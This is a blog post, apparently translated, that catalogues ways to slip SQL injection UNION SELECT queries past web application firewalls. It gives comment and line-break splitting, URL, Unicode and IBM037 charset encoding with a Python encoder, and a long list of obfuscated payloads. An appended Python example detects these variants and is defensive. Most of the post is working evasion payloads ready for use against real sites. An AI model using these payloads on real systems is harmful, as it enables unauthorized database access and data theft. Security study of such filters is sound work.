SQL injection bypass (6)
2022-06-29 07:45:00 【A τθ】
I. Bypass using ALL or DISTINCT
Remove duplicate rows:
select 1,2 from users where user_id=1 union DISTINCT select 1,2;
select 1,2 from users where user_id=1 union select DISTINCT 1,2;
Return all rows (keep duplicates):
select 1,2 from users where user_id=1 union all select 1,2;
select 1,2 from users where user_id=1 union select all 1,2;

II. Line-break bypass
Currently many WAFs filter union select, because a UNION-based query needs both keywords; they usually filter the two words as a pair, which makes UNION queries hard to use. Line breaks and comments inserted between the two keywords can bypass this.
1. Capture the request

2. Modify the parameters
id=-1
/* aogja gaogjaohoah gjaogja */
union select 1,user()-- &submit=1


III. HTTP data encoding bypass
1. Principle
Encoding bypasses are also commonly encountered when dealing with WAFs. Usually the WAF only handles the encodings it recognizes, for example only UTF-8 characters, while the server can decode more encodings than UTF-8.
So we only need to encode the payload in a format that the WAF does not recognize but the server can parse, and the WAF is bypassed.
For example, in the request we can change the value of the charset parameter in the Content-Type header to ibm037 (an encoding some servers support) and encode the payload in that character set.
Content-Type: application/x-www-form-urlencoded; charset=ibm037
Script:
import urllib.parse
s = 'id=-1 union select 1,user()-- &submit=1'
# encode the payload as IBM037 (EBCDIC) bytes, then percent-encode those bytes for the request body
ens = urllib.parse.quote(s.encode('ibm037'))
print(ens)

IV. URL encoding bypass
In IIS, URL-encoded input is automatically decoded into a string before being passed to the program. For example, union select can be written as u%6eion s%65lect.


V. Unicode encoding bypass
Form: "\u" or "%u" followed by the 4-digit hexadecimal Unicode code value.
IIS recognizes this encoding automatically, and some WAFs do not block it.

VI. union select bypass
Currently many WAFs intercept union select as a pair: either keyword alone is not intercepted, but the two together are.
sel<>ect        the program strips <> to empty (script-side processing)
sele/**/ct      the program strips /**/ to empty
/*!%53eLEct*/   URL encoding plus inline comment
se%0blect       whitespace bypass
sele%ct         percent-sign bypass
%53eLEct        encoding bypass
Case variation:
uNIoN sELecT 1,2
union all select 1,2
union DISTINCT select 1,2
null+UNION+SELECT+1,2
/*!union*//*!select*/1,2
union/**/select/**/1,2
and(select 1)=(Select 0xA*1000)/*!uNIOn*//*!SeLECt*/ 1,user()
/*!50000union*//*!50000select*/1,2
/*!40000union*//*!40000select*/1,2
%0aunion%0aselect 1,2
%250aunion%250aselect 1,2
%09union%09select 1,2
%0caunion%0cselect 1,2
%0daunion%0dselect 1,2
%0baunion%0bselect 1,2
%0d%0aunion%0d%0aselect 1,2
--+%0d%0aunion--+%0d%0aselect--+%0d%0a1,--+%0d%0a2
/*!12345union*//*!12345select*/1,2;
/* chinese */union/* chinese */select/* chinese */1,2;
/*!union*//*!00000all*//*!00000select*/1,2;
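As an added example that is not part of the original post, the following Python shows the defender's side of sections II to VI: a request body is decoded the way the backend and MySQL would read it (declared charset such as ibm037, repeated percent and %u decoding, /*! */ version comments, ordinary comments, "-- " line comments and the separator characters listed above) and only then matched for UNION ... SELECT. The charset parser, the helper names and the sample inputs are constructed here; variants that rely on the application itself stripping characters (sel<>ect, sele%ct) can only be matched by applying the same stripping the application does.

```python
import re
import urllib.parse

# Added example, not code from the original post: normalise a request body the
# way the backend and MySQL would read it, *then* look for UNION ... SELECT.
UNION_SELECT = re.compile(r"\bunion\s+(?:all\s+|distinct\s+)?select\b")

def charset_of(content_type, default="utf-8"):
    """Charset parameter of a Content-Type header value (constructed parser)."""
    m = re.search(r"charset=\"?([\w.-]+)", content_type, re.I)
    return m.group(1).lower() if m else default

def decode_body(raw, content_type):
    """Percent-decode to raw bytes first, then decode with the *declared*
    charset (e.g. ibm037), i.e. the way the server itself will read the body."""
    try:
        return urllib.parse.unquote_to_bytes(raw).decode(charset_of(content_type))
    except (LookupError, UnicodeDecodeError):
        return urllib.parse.unquote_to_bytes(raw).decode("utf-8", "replace")

def normalize(s, rounds=3):
    # Bounded repeated decoding handles double encoding: %250a -> %0a -> "\n"
    for _ in range(rounds):
        t = re.sub(r"%u([0-9a-fA-F]{4})", lambda m: chr(int(m.group(1), 16)), s)
        t = urllib.parse.unquote_plus(t)          # '+' is a form-encoded space
        if t == s:
            break
        s = t
    # MySQL executes the body of /*! ... */ and /*!NNNNN ... */: keep the body
    s = re.sub(r"/\*!\d{0,5}(.*?)\*/", r" \1 ", s, flags=re.S)
    # An ordinary /* ... */ comment is just a token separator
    s = re.sub(r"/\*.*?\*/", " ", s, flags=re.S)
    # "-- " (dash dash whitespace) comments out the rest of the line
    s = re.sub(r"--(?=\s)[^\n]*", " ", s)
    # Tab, LF, VT, FF and CR (%09 %0a %0b %0c %0d) are all separators to MySQL
    return re.sub(r"\s+", " ", s).strip().lower()

def is_union_select(body):
    return UNION_SELECT.search(normalize(body)) is not None

def inspect_request(raw_body, content_type):
    """What a WAF should do: decode as the server would, then normalise and match."""
    return is_union_select(decode_body(raw_body, content_type))

if __name__ == "__main__":
    # Constructed inputs, following the variants listed on this page
    for p in ["uNIoN sELecT 1,2", "/*!50000union*//*!50000select*/1,2",
              "--+%0d%0aunion--+%0d%0aselect--+%0d%0a1,--+%0d%0a2"]:
        print(is_union_select(p), repr(normalize(p)))
```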